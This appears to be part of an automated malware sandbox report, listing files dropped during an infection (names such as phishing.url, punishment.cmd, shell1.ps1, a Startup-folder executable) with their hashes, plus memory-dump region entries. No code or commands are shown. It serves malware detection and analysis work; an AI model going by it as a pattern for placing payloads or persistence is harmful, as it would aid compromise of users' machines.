                                                                            138009bc110e70983d2f7f4e0aba0ee7582b46491513aae423461b13c5a186efcf8cdf82a91980302d1c80e7bae00e65fb52a746a0f9af17a8eb663be04bb23e

                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\jaffa.exe

                                                                            Filesize

                                                                            512KB

                                                                            MD5

                                                                            6b1b6c081780047b333e1e9fb8e473b6

                                                                            SHA1

                                                                            8c31629bd4a4ee29b7ec1e1487fed087f5e4b1de

                                                                            SHA256

                                                                            e649b6e4284404bfa04639b8bf06367777c48201ef27dcdc256fe59167935fac

                                                                            SHA512

                                                                            022d40c1801fa495c9298d896221c8eefbad342d41922df8d014f2f49c3fe7fa91d603e0ee0de6be6f2143f9e0c4a6756b19260166ebd62ec3e1c64ad22bc447

                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\jkka.exe

                                                                            Filesize

                                                                            1002KB

                                                                            MD5

                                                                            42e4b26357361615b96afde69a5f0cc3

                                                                            SHA1

                                                                            35346fe0787f14236296b469bf2fed5c24a1a53d

                                                                            SHA256

                                                                            e58a07965ef711fc60ab82ac805cfc3926e105460356dbbea532ba3d9f2080eb

                                                                            SHA512

                                                                            fb8a2f4a9f280c0e3c0bb979016c11ea217bae9cebd06f7f2b5ef7b8973b98128ebc2e5cf76b824d71b889fca4510111a79b177dab592f332131f0d6789673a5

                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\lupa.png

                                                                            Filesize

                                                                            5KB

                                                                            MD5

                                                                            0a9d964a322ad35b99505a03e962e39a

                                                                            SHA1

                                                                            1b5fed1e04fc22dea2ae82a07c4cfd25b043fc51

                                                                            SHA256

                                                                            48cdea2dd75a0def891f0d5a2b3e6c611cfe0985125ac60915f3da7cacb2cd2b

                                                                            SHA512

                                                                            c4c9f019928f5f022e51b3f8eb7a45f4a35e609c66a41efc8df937762b78a47fc91736fac1a03003ca85113411f4b647a69605e66c73c778d98c842799e65d0d

                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\phishing.url

                                                                            Filesize

                                                                            1KB

                                                                            MD5

                                                                            6f62e208aad51e2d5ef2a12427b36948

                                                                            SHA1

                                                                            453eaf5afef9e82e2f50e0158e94cc1679b21bea

                                                                            SHA256

                                                                            cf0b709df6dfcb49d30e8bc0b9893aa9bd360e5894e08915b211829d2ae8536b

                                                                            SHA512

                                                                            f4732026625df183377c0c32baec3b663582d59ae59687d426d7637b5d701b3a169e0769b0106f8d9d8b42691697f12d0ed73a607f7bcd99d1f210ec98408501

                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\punishment.cmd

                                                                            Filesize

                                                                            200B

                                                                            MD5

                                                                            c8d2a5c6fe3c8efa8afc51e12cf9d864

                                                                            SHA1

                                                                            5d94a4725a5eebb81cfa76100eb6e226fa583201

                                                                            SHA256

                                                                            c2a655fef120a54658b2559c8344605a1ca4332df6079544ff3df91b7ecadbdb

                                                                            SHA512

                                                                            59e525a5296160b22b2d94a3a1cfb842f54fc08a9eb3dbcda7fd9e7355842eae86b7d478175fc06ee35d7836110e1091522daf523aeb2e6d851ee896770cd8b5

                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\punishment.vbs

                                                                            Filesize

                                                                            97B

                                                                            MD5

                                                                            c38e912e4423834aba9e3ce5cd93114b

                                                                            SHA1

                                                                            eab7bf293738d535bb447e375811d6daccc37a11

                                                                            SHA256

                                                                            c578d53f5dd1b954bce9c4a176c00f6f84424158b9990af2acb94f3060d78cc1

                                                                            SHA512

                                                                            5df1c1925d862c41822b45ae51f7b3ed08e0bc54cb38a41422d5e3faf4860d3d849b1c9bbadffa2fc88ee41a927e36cd7fcf9cd92c18753e3e2f02677ec50796

                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\readme.md

                                                                            Filesize

                                                                            167B

                                                                            MD5

                                                                            5ae93516939cd47ccc5e99aa9429067c

                                                                            SHA1

                                                                            3579225f7f8c066994d11b57c5f5f14f829a497f

                                                                            SHA256

                                                                            f815e2d4180ba6f5d96ab9694602ac42cde288b349cf98a90aad9bd76cc07589

                                                                            SHA512

                                                                            c2dd5a075d1d203d67752a3fff5661863d7da6c2d3d88f5d428f0b32c57df750c24459a782174b013a89bbfbf84d8fb964a2bec06fc0609dc44cc10519e62713

                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\regmess.exe

                                                                            Filesize

                                                                            536KB

                                                                            MD5

                                                                            5c4d7e6d02ec8f694348440b4b67cc45

                                                                            SHA1

                                                                            be708ac13886757024dd2288ddd30221aed2ed86

                                                                            SHA256

                                                                            faaa078106581114b3895fa8cf857b2cddc9bfc37242c53393e34c08347b8018

                                                                            SHA512

                                                                            71f990fe09bf8198f19cc442d488123e95f45e201a101d01f011bd8cdf99d6ccd2d0df233da7a0b482eab0595b34e234f4d14df60650c64f0ba0971b8345b41f

                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\scary.exe

                                                                            Filesize

                                                                            3.1MB

                                                                            MD5

                                                                            97cd39b10b06129cb419a72e1a1827b0

                                                                            SHA1

                                                                            d05b2d7cfdf8b12746ffc7a59be36634852390bd

                                                                            SHA256

                                                                            6bc108ddb31a255fdd5d1e1047dcd81bc7d7e78c96f7afa9362cecbb0a5b3dbc

                                                                            SHA512

                                                                            266d5c0eb0264b82d703d7b5dc22c9e040da239aaca1691f7e193f5391d7bafc441aff3529e42e84421cf80a8d5fca92c2b63019c3a475080744c7f100ea0233

                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\screenshot.png

                                                                            Filesize

                                                                            266KB

                                                                            MD5

                                                                            de8ddeeb9df6efab37b7f52fe5fb4988

                                                                            SHA1

                                                                            61f3aac4681b94928bc4c2ddb0f405b08a8ade46

                                                                            SHA256

                                                                            47b5cbeb94eaec10a7c52458195d5ba7e2e53d732e9e750f1092eb016fd65159

                                                                            SHA512

                                                                            6f8e30ddb646ea5685b0f622b143cdd7bc5574a765f4f14797df45739afcdefaba7786bac9ad8637c64893a33f14e5adcfb3af5869fc10c105760a844108e27e

                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\selfaware.exe

                                                                            Filesize

                                                                            797KB

                                                                            MD5

                                                                            5cb9ba5071d1e96c85c7f79254e54908

                                                                            SHA1

                                                                            3470b95d97fb7f1720be55e033d479d6623aede2

                                                                            SHA256

                                                                            53b21dcfad586cdcb2bb08d0cfe62f0302662ebe48d3663d591800cf3e8469a5

                                                                            SHA512

                                                                            70d4f6c62492209d497848cf0e0204b463406c5d4edf7d5842a8aa2e7d4edb2090f2d27862841a217786e6813198d35ea29b055e0118b73af516edf0c79dcfad

                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\shell1.ps1

                                                                            Filesize

                                                                            356B

                                                                            MD5

                                                                            29a3efd5dbe76b1c4bbc2964f9e15b08

                                                                            SHA1

                                                                            02c2fc64c69ab63a7a8e9f0d5d55fe268c36c879

                                                                            SHA256

                                                                            923ad6ca118422ee9c48b3cc23576ee3c74d44c0e321a60dc6c2f49921aea129

                                                                            SHA512

                                                                            dfa3cdaab6cc78dddf378029fdb099e4bb1d9dcad95bd6cd193eca7578c9d0de832ae93c5f2035bc6e000299ad4a157cc58e6b082287e53df94dcc9ddbab7c96

                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\spinner.gif

                                                                            Filesize

                                                                            44KB

                                                                            MD5

                                                                            324f8384507560259aaa182eb0c7f94a

                                                                            SHA1

                                                                            3b86304767e541ddb32fdda2e9996d8dbeca16ed

                                                                            SHA256

                                                                            f48c4f9c5fc87e8d7679948439544a97f1539b423860e7c7470bd9b563aceab5

                                                                            SHA512

                                                                            cc1b61df496cfb7c51d268139c6853d05bace6f733bc13c757c87cd64a11933c3a673b97fba778e515a9ff5f8c4ea52e7091f3beda1d8452bc3f6b59382f300d

                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\stopwerfault.cmd

                                                                            Filesize

                                                                            42B

                                                                            MD5

                                                                            7eacd2dee5a6b83d43029bf620a0cafa

                                                                            SHA1

                                                                            9d4561fa2ccf14e05265c288d8e7caa7a3df7354

                                                                            SHA256

                                                                            d2ac09afa380a364682b69e5d5f6d30bb0070ca0148f4077204c604c8bfae03b

                                                                            SHA512

                                                                            fd446a8968b528215df7c7982d8dae208b0d8741410d7911023acee6ad78fee4fdec423a5f85dd00972a6ac06b24a63518f741490deab97639628b19256791f8

                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\the.exe

                                                                            Filesize

                                                                            764KB

                                                                            MD5

                                                                            e45dcabc64578b3cf27c5338f26862f1

                                                                            SHA1

                                                                            1c376ec14025cabe24672620dcb941684fbd42b3

                                                                            SHA256

                                                                            b05176b5e31e9e9f133235deb31110798097e21387d17b1def7c3e2780bbf455

                                                                            SHA512

                                                                            5d31565fbb1e8d0effebe15edbf703b519f6eb82d1b4685661ce0efd6a25d89596a9de27c7690c7a06864ce957f8f7059c8fdee0993023d764168c3f3c1b8da9

                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\web.htm

                                                                            Filesize

                                                                            367B

                                                                            MD5

                                                                            f63c0947a1ee32cfb4c31fcbc7af3504

                                                                            SHA1

                                                                            ee46256901fa8a5c80e4a859f0f486e84c61cbaa

                                                                            SHA256

                                                                            bfe43062464da1f859ea3c2adace8ff251e72d840b32ef78c15b64c99f56d541

                                                                            SHA512

                                                                            1f8666abfd3e5543710c6d2c5fb8c506d10d9f0f0306b25ba81176aa595a5afa8c288b522832f8ffe0a12873eaf2c2a0eff49ce4caa88400e8db7a8870a42184

                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\web2.htm

                                                                            Filesize

                                                                            684B

                                                                            MD5

                                                                            1fc6bb77ac7589f2bffeaf09bcf7a0cf

                                                                            SHA1

                                                                            028bdda6b433e79e9fbf021b94b89251ab840131

                                                                            SHA256

                                                                            5d0147dc2b94b493d34efd322da66921f2d3d2b1cc7b0226ac1d494f99a933a1

                                                                            SHA512

                                                                            6ef21162b85975fdd58628dcab0d610ce7acd8ab36820a09e9e8eb1e6b2d76060ed4ad2b48bdbe1e212ec84abb309e124a752e078f6747893a83562824ea6af6

                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\web3.htm

                                                                            Filesize

                                                                            904KB

                                                                            MD5

                                                                            9e118cccfa09666b2e1ab6e14d99183e

                                                                            SHA1

                                                                            e6d3ab646aa941f0ca607f12b968c1e45c1164b4

                                                                            SHA256

                                                                            d175dc88764d5ea95f19148d52fde1262125fedb41937dc2134f6f787ae26942

                                                                            SHA512

                                                                            da02267196129ebeaa4c5ff74d63351260964fa8535343e3f10cd3fcf8f0e3d0a87c61adb84ec68b4770d3ef86535d11e4eacf6437c5f5fbe52c34aa6e07bd04

                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\wim.dll

                                                                            Filesize

                                                                            13.4MB

                                                                            MD5

                                                                            9191cec82c47fb3f7249ff6c4e817b34

                                                                            SHA1

                                                                            1d9854a78de332bc45c1712b0c3dac3fe6fda029

                                                                            SHA256

                                                                            55ef4ff325d653a53add0ca6c41bc3979cdb4fc3ef1c677998dc2c9ea263c15b

                                                                            SHA512

                                                                            2b482e947e26e636e7ed077b914788b1af8c28722efcbd481dd22940cfb771e38c3e2ed6c8f9208eb813085c7d4460978e13a5ef52441e7be7ada9f6414a6673

                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\wimloader.dll

                                                                            Filesize

                                                                            667KB

                                                                            MD5

                                                                            a67128f0aa1116529c28b45a8e2c8855

                                                                            SHA1

                                                                            5fbaf2138ffc399333f6c6840ef1da5eec821c8e

                                                                            SHA256

                                                                            8dc7e5dac39d618c98ff9d8f19ecb1be54a2214e1eb76e75bd6a27873131d665

                                                                            SHA512

                                                                            660d0ced69c2c7dd002242c23c8d33d316850505fc30bad469576c97e53e59a32d13aa55b8b64459c180e7c76ea7f0dae785935f69d69bbd785ee7094bd9b94b

                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\xcer.cer

                                                                            Filesize

                                                                            1KB

                                                                            MD5

                                                                            a58d756a52cdd9c0488b755d46d4df71

                                                                            SHA1

                                                                            0789b35fd5c2ef8142e6aae3b58fff14e4f13136

                                                                            SHA256

                                                                            93fc03df79caa40fa8a637d153e8ec71340af70e62e947f90c4200ccba85e975

                                                                            SHA512

                                                                            c31a9149701346a4c5843724c66c98aae6a1e712d800da7f2ba78ad9292ad5c7a0011575658819013d65a84853a74e548067c04c3cf0a71cda3ce8a29aad3423

                                                                          • C:\Users\Admin\AppData\Local\Temp\wim_b2e36556-3ffb-46e5-bdf1-e29f6550e332\load.cmd

                                                                            Filesize

                                                                            96B

                                                                            MD5

                                                                            be6bfde09df708f7e8cbda39a6ab17f6

                                                                            SHA1

                                                                            dc7f48ebf62fdd4b2a2935b23245a20bb9c3b237

                                                                            SHA256

                                                                            fe1a8ee1e2d6da92ea4a8bb0ab40b7bf8d06cd571bf627671838ac8dce3c15e8

                                                                            SHA512

                                                                            71751cf9e79e50a330bf1e237ce507799d965b2b56e196ee23cdb96aadbc8538fa57fe6fbb8415678da35fa98abc0e746c0c7570d6ea155ea7bd6be840d7177e

                                                                          • C:\Users\Admin\AppData\Local\Temp\wimloader_bc2f1887-d493-4fcc-ac3a-25e530939809\caller.cmd

                                                                            Filesize

                                                                            112B

                                                                            MD5

                                                                            7aa447ec3e79e0d47516536d24a56ae5

                                                                            SHA1

                                                                            b91f565b38bbbee8924640507680750757e96ee9

                                                                            SHA256

                                                                            9b406b2eb50917ab2fd8a494c800665f61adebb878bb21f73b0c477b980957b5

                                                                            SHA512

                                                                            9a5ed7effc54f1da116c831e9fb3bf1b0d37b2bf6995d18e197ac5330e1100ec98f144148b5285da149df7dd20fe82f62f681f3155b25f922c1b201d82d34e3a

                                                                          • C:\Users\Admin\AppData\Local\Temp\yc59zIkegofu.bat

                                                                            Filesize

                                                                            195B

                                                                            MD5

                                                                            a94e8f2357a3ed30256d1dec2f62a57a

                                                                            SHA1

                                                                            e3cf72b32a01e6ade445b9b3145a6fe482e0d6c1

                                                                            SHA256

                                                                            713b300e646eeb34986de18e6c69ce53dbd13ef5a2ec6f28cf477daa72d086a9

                                                                            SHA512

                                                                            72e4989d79b4c610e487b762505d60a566c73dd70a975d18cdd1b3249699343386fa6b7f4a632b6688301f98ab3dc4c1e1282aa4498de7edaf09f65fabf3468e

                                                                          • C:\Users\Admin\AppData\Local\Temp\~DFAD421CD9A68E1A5C.TMP

                                                                            Filesize

                                                                            24KB

                                                                            MD5

                                                                            09f5fb91f75086cc5dcdf75e813c7e40

                                                                            SHA1

                                                                            47a34e4db5cc097a873e53af4115095d00d33f2d

                                                                            SHA256

                                                                            858ba29f97ac49f4c750cc27498fa5d3006734fd4a9ba904d663b598064f0baf

                                                                            SHA512

                                                                            f679d78c4190dc15f3447f59862a78a578b6d075bec53e787c39a0ba678d0fc65df656b8b7f1c36db802a6f0264b9942ad0a465e61e1501424e494b2c8e19275

                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

                                                                            Filesize

                                                                            19KB

                                                                            MD5

                                                                            1d2fcdf1253f397efbecedc4c9f4ac5f

                                                                            SHA1

                                                                            d7ce738f340b56c2a67d7df20300db1853e8f451

                                                                            SHA256

                                                                            795a994927fe9a0d210937b7c730151e41536c0da58ee3723cc25f242c232e77

                                                                            SHA512

                                                                            348d9a73ac4c825e34f65bd16e80e98d27d04585c1b2279331d92dcebf9bf0b6c3dc6ff5df0a0038f522b26d5ac5f60784a3def2c7313b051a5883f7f77bc51a

                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7c148ac38012fc3caa04b1bbe75feba0.exe

                                                                            Filesize

                                                                            37KB

                                                                            MD5

                                                                            ad8378c96a922dcfe813935d1eec9ae4

                                                                            SHA1

                                                                            0e7ee31880298190258f5282f6cc2797fccdc134

                                                                            SHA256

                                                                            9a7b8171f8c6bd4bb61b7d8baf7dab921983ab7767705c3f1e1265704599ab98

                                                                            SHA512

                                                                            d38a7581ef5c3dcc8752fc2465ad698605bbd38bf380201623265e5ef121510d3f34116438727e60b3832e867e2ed4fd52081d58690690ff98b28cde80f6af5f

                                                                          • C:\Users\Admin\Desktop\3.exe

                                                                            Filesize

                                                                            7.9MB

                                                                            MD5

                                                                            de1fa21d63199d3d689312e34ba4a809

                                                                            SHA1

                                                                            a20cae85b8cdc5e9bf8b285bbe5022d1c18e62fb

                                                                            SHA256

                                                                            a6de4a6de5b14dcd4fcc623ef8170205784a8e2995cd297a1c1d9925206b55e6

                                                                            SHA512

                                                                            ebf9792966f8e3df5457e32ff52fab8097b3d2b603eb899d20305b3f8ed46184f5302495cbb3d669e699966e230fcb262621c46354fbb680859a03f40d0c2799

                                                                          • C:\Windows\SysWOW64\nqgnztrqpu.exe

                                                                            Filesize

                                                                            512KB

                                                                            MD5

                                                                            a0fe55480f5b089ca4755018315ec641

                                                                            SHA1

                                                                            d84fea773c282a548ba6f41183462f7057d43148

                                                                            SHA256

                                                                            1efddc74693c1ad15a3056d4ac0acd1a8cc175c70cf422157ee02cee5072cfe8

                                                                            SHA512

                                                                            e94d4d75d3aafa85b1b46beb00409911f042e81839d0e090cc4c6258f6bfda4bef6254c021f80da78c2468652d3325141a3a38ca12f5ebec414064ac98a0ee46

                                                                          • memory/444-378-0x0000000001080000-0x0000000002080000-memory.dmp

                                                                            Filesize

                                                                            16.0MB

                                                                          • memory/772-5905-0x0000000000C80000-0x0000000000FA4000-memory.dmp

                                                                            Filesize

                                                                            3.1MB

                                                                          • memory/808-5818-0x0000000000370000-0x0000000000694000-memory.dmp

                                                                            Filesize

                                                                            3.1MB

                                                                          • memory/904-4416-0x0000000000A00000-0x0000000000D24000-memory.dmp

                                                                            Filesize

                                                                            3.1MB

                                                                          • memory/1048-5541-0x00000000057D0000-0x0000000005C0E000-memory.dmp

                                                                            Filesize

                                                                            4.2MB

                                                                          • memory/1048-5507-0x00000000057D0000-0x0000000005C0E000-memory.dmp

                                                                            Filesize

                                                                            4.2MB

                                                                          • memory/1048-5150-0x00000000057D0000-0x0000000005C0E000-memory.dmp

                                                                            Filesize

                                                                            4.2MB

                                                                          • memory/1048-5148-0x00000000057D0000-0x0000000005C0E000-memory.dmp

                                                                            Filesize

                                                                            4.2MB

                                                                          • memory/1048-315-0x0000000002710000-0x0000000002712000-memory.dmp

                                                                            Filesize

                                                                            8KB

                                                                          • memory/1188-3437-0x0000000000E10000-0x0000000000E6E000-memory.dmp

                                                                            Filesize

                                                                            376KB

                                                                          • memory/1840-5475-0x0000000000400000-0x000000000083E000-memory.dmp

                                                                            Filesize

                                                                            4.2MB

                                                                          • memory/1964-3479-0x0000000002080000-0x00000000036A7000-memory.dmp

                                                                            Filesize

                                                                            22.2MB

                                                                          • memory/2072-5177-0x0000000000900000-0x000000000090A000-memory.dmp

                                                                            Filesize

                                                                            40KB

                                                                          • memory/2436-412-0x00000000057F0000-0x0000000005D39000-memory.dmp

                                                                            Filesize

                                                                            5.3MB

                                                                          • memory/2436-416-0x00000000057F0000-0x0000000005D39000-memory.dmp

                                                                            Filesize

                                                                            5.3MB

                                                                          • memory/2436-430-0x00000000057F0000-0x0000000005D39000-memory.dmp

                                                                            Filesize

                                                                            5.3MB

                                                                          • memory/2436-428-0x00000000057F0000-0x0000000005D39000-memory.dmp

                                                                            Filesize

                                                                            5.3MB

                                                                          • memory/2436-436-0x00000000057F0000-0x0000000005D39000-memory.dmp

                                                                            Filesize

                                                                            5.3MB

                                                                          • memory/2436-438-0x00000000057F0000-0x0000000005D39000-memory.dmp

                                                                            Filesize

                                                                            5.3MB

                                                                          • memory/2436-434-0x00000000057F0000-0x0000000005D39000-memory.dmp

                                                                            Filesize

                                                                            5.3MB

                                                                          • memory/2436-389-0x00000000057F0000-0x0000000005D39000-memory.dmp

                                                                            Filesize

                                                                            5.3MB

                                                                          • memory/2436-394-0x00000000057F0000-0x0000000005D39000-memory.dmp

                                                                            Filesize

                                                                            5.3MB

                                                                          • memory/2436-400-0x00000000057F0000-0x0000000005D39000-memory.dmp

                                                                            Filesize

                                                                            5.3MB

                                                                          • memory/2436-391-0x00000000057F0000-0x0000000005D39000-memory.dmp

                                                                            Filesize

                                                                            5.3MB

                                                                          • memory/2436-396-0x00000000057F0000-0x0000000005D39000-memory.dmp

                                                                            Filesize

                                                                            5.3MB

                                                                          • memory/2436-398-0x00000000057F0000-0x0000000005D39000-memory.dmp

                                                                            Filesize

                                                                            5.3MB

                                                                          • memory/2436-402-0x00000000057F0000-0x0000000005D39000-memory.dmp

                                                                            Filesize

                                                                            5.3MB

                                                                          • memory/2436-440-0x00000000057F0000-0x0000000005D39000-memory.dmp

                                                                            Filesize

                                                                            5.3MB

                                                                          • memory/2436-406-0x00000000057F0000-0x0000000005D39000-memory.dmp

                                                                            Filesize

                                                                            5.3MB

                                                                          • memory/2436-404-0x00000000057F0000-0x0000000005D39000-memory.dmp

                                                                            Filesize

                                                                            5.3MB

                                                                          • memory/2436-410-0x00000000057F0000-0x0000000005D39000-memory.dmp

                                                                            Filesize

                                                                            5.3MB

                                                                          • memory/2436-408-0x00000000057F0000-0x0000000005D39000-memory.dmp

                                                                            Filesize

                                                                            5.3MB

                                                                          • memory/2436-418-0x00000000057F0000-0x0000000005D39000-memory.dmp

                                                                            Filesize

                                                                            5.3MB

                                                                          • memory/2436-3301-0x000000000C030000-0x000000000C710000-memory.dmp

                                                                            Filesize

                                                                            6.9MB

                                                                          • memory/2436-380-0x00000000057F0000-0x0000000005D39000-memory.dmp

                                                                            Filesize

                                                                            5.3MB

                                                                          • memory/2436-414-0x00000000057F0000-0x0000000005D39000-memory.dmp

                                                                            Filesize

                                                                            5.3MB

                                                                          • memory/2436-372-0x0000000005D40000-0x0000000006290000-memory.dmp

                                                                            Filesize

                                                                            5.3MB

                                                                          • memory/2436-373-0x00000000057F0000-0x0000000005D3E000-memory.dmp

                                                                            Filesize

                                                                            5.3MB

                                                                          • memory/2436-442-0x00000000057F0000-0x0000000005D39000-memory.dmp

                                                                            Filesize

                                                                            5.3MB

                                                                          • memory/2436-432-0x00000000057F0000-0x0000000005D39000-memory.dmp

                                                                            Filesize

                                                                            5.3MB

                                                                          • memory/2436-426-0x00000000057F0000-0x0000000005D39000-memory.dmp

                                                                            Filesize

                                                                            5.3MB

                                                                          • memory/2436-420-0x00000000057F0000-0x0000000005D39000-memory.dmp

                                                                            Filesize

                                                                            5.3MB

                                                                          • memory/2436-422-0x00000000057F0000-0x0000000005D39000-memory.dmp

                                                                            Filesize

                                                                            5.3MB

                                                                          • memory/2436-381-0x00000000057F0000-0x0000000005D39000-memory.dmp

                                                                            Filesize

                                                                            5.3MB

                                                                          • memory/2436-424-0x00000000057F0000-0x0000000005D39000-memory.dmp

                                                                            Filesize

                                                                            5.3MB

                                                                          • memory/2436-387-0x00000000057F0000-0x0000000005D39000-memory.dmp

                                                                            Filesize

                                                                            5.3MB

                                                                          • memory/2436-385-0x00000000057F0000-0x0000000005D39000-memory.dmp

                                                                            Filesize

                                                                            5.3MB

                                                                          • memory/2436-383-0x00000000057F0000-0x0000000005D39000-memory.dmp

                                                                            Filesize

                                                                            5.3MB

                                                                          • memory/2448-4461-0x0000000000260000-0x0000000000584000-memory.dmp

                                                                            Filesize

                                                                            3.1MB

                                                                          • memory/2552-5139-0x0000000000E70000-0x0000000001194000-memory.dmp

                                                                            Filesize

                                                                            3.1MB

                                                                          • memory/2592-6182-0x0000000000340000-0x000000000035C000-memory.dmp

                                                                            Filesize

                                                                            112KB

                                                                          • memory/2720-6046-0x0000000004AC0000-0x0000000004B04000-memory.dmp

                                                                            Filesize

                                                                            272KB

                                                                          • memory/2720-6045-0x0000000001EA0000-0x0000000001F3A000-memory.dmp

                                                                            Filesize

                                                                            616KB

                                                                          • memory/2720-6031-0x0000000000400000-0x0000000000541000-memory.dmp

                                                                            Filesize

                                                                            1.3MB

                                                                          • memory/2720-6269-0x0000000000400000-0x0000000000541000-memory.dmp

                                                                            Filesize

                                                                            1.3MB

                                                                          • memory/2720-6259-0x0000000005960000-0x0000000005974000-memory.dmp

                                                                            Filesize

                                                                            80KB

                                                                          • memory/2796-4172-0x00000000009A0000-0x0000000000CC4000-memory.dmp

                                                                            Filesize

                                                                            3.1MB

                                                                          • memory/2800-5363-0x00000000010C0000-0x00000000013E4000-memory.dmp

                                                                            Filesize

                                                                            3.1MB

                                                                          • memory/2956-2-0x0000000000260000-0x0000000000284000-memory.dmp

                                                                            Filesize

                                                                            144KB

                                                                          • memory/2956-0-0x000000007463E000-0x000000007463F000-memory.dmp

                                                                            Filesize

                                                                            4KB

                                                                          • memory/2956-3-0x0000000074630000-0x0000000074D1E000-memory.dmp

                                                                            Filesize

                                                                            6.9MB

                                                                          • memory/2956-6126-0x0000000074630000-0x0000000074D1E000-memory.dmp

                                                                            Filesize

                                                                            6.9MB

                                                                          • memory/2956-782-0x000000007463E000-0x000000007463F000-memory.dmp

                                                                            Filesize

                                                                            4KB

                                                                          • memory/2956-1-0x0000000000120000-0x000000000017E000-memory.dmp

                                                                            Filesize

                                                                            376KB

                                                                          • memory/2956-3300-0x0000000074630000-0x0000000074D1E000-memory.dmp

                                                                            Filesize

                                                                            6.9MB

                                                                          • memory/3048-5173-0x00000000012D0000-0x000000000131A000-memory.dmp

                                                                            Filesize

                                                                            296KB

                                                                          • memory/3112-4460-0x000000001B440000-0x000000001B44C000-memory.dmp

                                                                            Filesize

                                                                            48KB

                                                                          • memory/3112-4415-0x0000000001F40000-0x0000000001F48000-memory.dmp

                                                                            Filesize

                                                                            32KB

                                                                          • memory/3112-4414-0x000000001B560000-0x000000001B842000-memory.dmp

                                                                            Filesize

                                                                            2.9MB

                                                                          • memory/3132-3487-0x0000000000C40000-0x0000000002267000-memory.dmp

                                                                            Filesize

                                                                            22.2MB

                                                                          • memory/3132-4174-0x0000000000C40000-0x0000000002267000-memory.dmp

                                                                            Filesize

                                                                            22.2MB

                                                                          • memory/3256-4584-0x0000000001370000-0x0000000001694000-memory.dmp

                                                                            Filesize

                                                                            3.1MB

                                                                          • memory/3324-5592-0x0000000001320000-0x0000000001644000-memory.dmp

                                                                            Filesize

                                                                            3.1MB

                                                                          • memory/3420-4144-0x00000000001F0000-0x0000000000514000-memory.dmp

                                                                            Filesize

                                                                            3.1MB

                                                                          • memory/3788-4145-0x0000000000D00000-0x0000000000D8A000-memory.dmp

                                                                            Filesize

                                                                            552KB

                                                                          • memory/3952-5169-0x00000000010C0000-0x0000000001100000-memory.dmp

                                                                            Filesize

                                                                            256KB

                                                                          • memory/3968-6127-0x0000000000880000-0x0000000000892000-memory.dmp

                                                                            Filesize

                                                                            72KB